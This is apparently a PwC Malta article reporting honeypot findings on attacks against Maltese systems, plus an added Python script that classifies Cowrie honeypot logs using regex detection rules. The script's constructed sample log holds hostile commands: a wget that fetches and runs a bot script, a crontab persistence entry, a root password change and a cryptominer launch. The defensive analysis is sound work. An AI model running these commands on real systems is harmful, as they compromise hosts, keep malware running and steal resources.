Understanding Cyber Threats: Insights from T-Pot Honeypot

In today’s digital landscape, grasping the complexities of cyber threats is crucial. This article shares key findings from T-Pot, an advanced open-source honeypot framework that our PwC Cyber Security & Privacy team deployed in Malta between August and October. T-Pot mimics real computer systems to attract and analyse cyber attacks, helping us understand threats specifically targeting the Maltese islands. During this period, we recorded over six million attacks, with more than five million involving Distributed Denial of Service (DDoS) packets.

In Malta's digital landscape, the greatest threat to our security is the illusion that we are secure

Key Observations and Risks

Our analysis of T-Pot’s data revealed several significant threats targeting exposed services, showcasing the evolving tactics of attackers:

Malware is deployed to enrol victims’ devices into botnets like Mirai to be used for DDoS attacks.

Attackers manipulate passwords to gain elevated access and compromise systems.

Attackers use cron jobs to keep malware active after reboots, making it harder to detect.

We observed attempts to spread malware and extend attackers' reach.

Attackers used mail servers for phishing, risking reputation damage and IP blacklisting.

Attackers hijack system resources for unauthorised cryptocurrency mining, increasing costs and reducing performance.
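
The following is an added example, not code from the original article or from PwC's deployment: one way to triage commands recorded by Cowrie, the SSH/Telnet honeypot bundled with T-Pot, into the behaviours listed above. The rule names, regular expressions and log lines are assumptions constructed for illustration.

```python
import json
import re
from collections import defaultdict

# Illustrative heuristics for the behaviours listed above; not an exhaustive ruleset.
RULES = {
    "cron_persistence": re.compile(r"\bcrontab\b|/etc/cron|/var/spool/cron"),
    # The lookbehind skips reads such as `cat /etc/passwd`, which change nothing.
    "password_change": re.compile(r"(?<![/\w])(?:ch)?passwd\b"),
    "payload_download": re.compile(r"\b(?:wget|curl)\b[^|;&]*\b(?:https?|ftp)://"),
    "cryptomining": re.compile(r"xmrig|minerd|stratum\+tcp://", re.IGNORECASE),
}

# Constructed events in Cowrie's JSON-lines shape (not data from the deployment).
# The last line is deliberately truncated, as happens when a log is read mid-write.
SAMPLE_LOG = """\
{"eventid": "cowrie.login.success", "src_ip": "192.0.2.10", "username": "root", "password": "admin"}
{"eventid": "cowrie.command.input", "src_ip": "192.0.2.10", "input": "cd /tmp; wget http://example.invalid/bot.sh; sh bot.sh"}
{"eventid": "cowrie.command.input", "src_ip": "192.0.2.10", "input": "echo '@reboot /tmp/bot.sh' | crontab -"}
{"eventid": "cowrie.command.input", "src_ip": "198.51.100.7", "input": "echo 'root:Constructed1' | chpasswd"}
{"eventid": "cowrie.command.input", "src_ip": "198.51.100.7", "input": "cat /etc/passwd"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.113.5", "input": "./xmrig -o stratum+tcp://pool.example.invalid:3333"}
{"eventid": "cowrie.command.input", "src_ip": "203.0.
"""


def classify(log_text):
    """Map each matched behaviour to the sorted source IPs that exhibited it."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip blank, truncated or non-JSON lines
        if not isinstance(event, dict) or event.get("eventid") != "cowrie.command.input":
            continue  # only commands typed into the fake shell are classified
        command = str(event.get("input", ""))
        for behaviour, pattern in RULES.items():
            if pattern.search(command):
                hits[behaviour].add(event.get("src_ip", "unknown"))
    return {behaviour: sorted(ips) for behaviour, ips in hits.items()}


if __name__ == "__main__":
    for behaviour, sources in classify(SAMPLE_LOG).items():
        print(f"{behaviour}: {', '.join(sources)}")
```

The same rules can be run over files on a monitored host's own shell history or audit logs, where a match on a production system warrants investigation rather than just a tally.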

Emerging Threats: GAFGYT and Mirai Botnets

GAFGYT and Mirai are two notorious botnets that use various malware strains to target IoT devices and enrol them in their networks of bots. While Mirai is famous for exploiting default credentials to create a vast network of bots for DDoS attacks, GAFGYT utilises known vulnerabilities in devices like routers to achieve similar goals. Recent variants of these botnets even employ techniques to evade detection, such as hiding their activities within encrypted networks like Tor. The evolution of these botnets highlights the urgent need for robust cybersecurity measures and continuous monitoring of network traffic.

Conclusion

The insights gained from our T-Pot honeypot underscore the sophistication of current cyber threats and the importance of proactive measures. Organisations must stay informed and adopt strategies to detect and mitigate these risks, protecting their systems and data from malicious actors. By investing in advanced security solutions and fostering a culture of cybersecurity awareness, businesses can significantly enhance their defences against these ever-evolving threats.

Contact us

Michel Ganado

Digital Services Leader, PwC Malta

Tel: +356 2564 7091

Andrew Schembri

Digital Services Partner, PwC Malta

Tel: +356 7921 1355

Kirsten Cremona

Senior Manager, Digital Services, PwC Malta

Tel: +356 7975 6911
